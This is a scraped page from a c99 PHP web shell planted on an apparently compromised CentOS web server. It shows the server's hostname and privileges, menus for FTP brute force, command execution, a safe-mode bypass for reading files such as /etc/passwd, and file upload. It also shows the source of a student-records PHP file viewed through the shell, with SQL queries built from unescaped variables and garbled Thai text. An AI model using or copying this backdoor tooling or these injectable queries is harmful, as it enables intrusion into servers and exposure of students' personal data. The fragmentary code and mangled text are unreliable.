110.164.51.230 - phpshell

!c99Shell v. 1.0 pre-release build #16!
Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 EDT 2010 i686 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/manage/ drwxr-xr-x Free 52.82 GB of 127.8 GB (41.33%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686

uid=48(apache) gid=48(apache) groups=48(apache)

Safe-mode: OFF (not secure)

/var/www/html/manage/ drwxr-xr-x
Free 52.82 GB of 127.8 GB (41.33%)
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

Viewing file: StudentProvinceList.php (12.13 KB) -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |






<?=$_Config_sitename;?> - ўйНБЩЕ№СЎИЦЎЙТ - ЁУ№З№№СЎИЦЎЙТ ЁУб№ЎµТБ»ХЎТГИЦЎЙТ







  
    
    
    execQuery($query);
			$numrows = $dbObj->_numrows;
			
			/**  Paging  */
			$display = ( !isset ($_GET['page']) ) ? 1 : $_GET['page'];
			$start = ( ($display * $limit) - $limit );
			/**  Paging  */

			if( $studentSex == "0" ) {
				$query = " SELECT *  FROM $myTable  WHERE homeProvinceId='$homeProvinceId'  ORDER BY $myTableFK ASC ";
			} else {
				$query = " SELECT *  FROM $myTable  WHERE studentSex='$studentSex'  AND  homeProvinceId='$homeProvinceId'  
								   ORDER BY $myTableFK ASC ";
			}
		
			$query .= " LIMIT $start, $limit ";
			$result = $dbObj->execQuery($query);
    ?>
    
     
      
        
      
      
        Л№йТЛЕСЎ » ўйНБЩЕ№СЎИЦЎЙТ » ЁУ№З№№СЎИЦЎЙТ ЁУб№ЎµТБЁС§ЛЗСґ
        
      
         
      
      
        
        
          
            ·Сй§ЛБґ:  ГТВЎТГ
            ЁУ№З№ўйНБЩЕµиНЛ№йТ
          
          
        
         0 ) { ?>
        
            
              ўйНБЩЕ№СЎИЦЎЙТ µТБЁС§ЛЗСґ execQuery($sql11);
				$rs11 = $dbObj->fetchArray($result11);
				$dbObj->freeresult($result11);
					echo $rs11['provinceName'];
            ?>
            
          
         fetchArray($result) ) { 
				$bgColor = ( $bgColor == "#FFFFFF" ) ? "#F9FBFB" : "#FFFFFF";
				
				$studentId = $row['studentId'];
				
				if( $studentSex == "0" ) {
					$sql10 = " SELECT *  FROM  StudentMaster   WHERE studentId='$studentId'  ORDER BY studentId ASC ";
				} else {
					$sql10 = " SELECT *  FROM  StudentMaster   WHERE studentId='$studentId'  AND  studentSex='$studentSex'  ORDER BY studentId ASC ";
				}
				$result10 = $dbObj->execQuery($sql10);
				$rs = $dbObj->fetchArray($result10); 
				//if( $rs['studentStatus'] == 1 ) {
					$programId = $rs['programId'];
					$prefixId = $rs['prefixId'];
					$officerId1 = $rs['officerId1'];
          ?>
          
          
            No
            ГЛСК
			ЄЧиН-№ТБКЎШЕ
			ЛЕСЎКЩµГ
			ГШи№·Хи
			НТЁТГВм·Хи»ГЦЎЙТ
            
          
            
            
            execQuery($sql1);
				$rs1 = $dbObj->fetchArray($result1);
				 $dbObj->freeresult($result1);
					echo $rs1['prefixName'];
            ?>
            execQuery($sql2);
				  $rs2 = $dbObj->fetchArray($result2);
				  $dbObj->freeresult($result2);
					  echo $rs2['programAbbr'];
          	  ?>
            execQuery($query3);
          	  	$rs3 = $dbObj->fetchArray($result3);
				$dbObj->freeresult($result3);
          	  		echo $rs3['genNo'];
          	  ?>
            execQuery($query4);
          	  	$rs4 = $dbObj->fetchArray($result4);
				$dbObj->freeresult($result4);
					if( $rs4['officerName'] != "" )
          	  			echo "Н.". $rs4['officerName'] ." ". $rs4['officerSurname'];
					else 
						echo " ";
          	  ?>
          
          
        
		
        
        
          
           0 ) { ?>
          
            
                
            
            
                Л№йТ: 
                     1) {	
                            $previous = $display - 1;					

                    ?>
bool(false)


:: Command execute ::
Enter:   Select:  



:: Shadow's tricks :D  ::

  
    Useful Commands 
    
    
      
        
        
          
        
         
        
          

        Warning. Kernel may be alerted using higher levels 
    
    
  
   Kernel Info: 
      
      
	  
	  
	  
	  
    
    



:: Preddy's tricks :D  ::

  
    Php Safe-Mode Bypass (Read Files)
    


    
      
      File:  

 eg: /etc/passwd

      
      
      
           
      
      
      	
	
          

      
    
    
  
   Php Safe-Mode Bypass (List Directories):     
      

      Dir:  

 eg: /etc/


    
    




 :: Search ::  - regexp 
 :: Upload :: 
[ ok ]



:: Make Dir :: 
[ ok ] :: Make File :: 
[ ok ]

:: Go Dir ::  :: Go File :: 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.006 ]--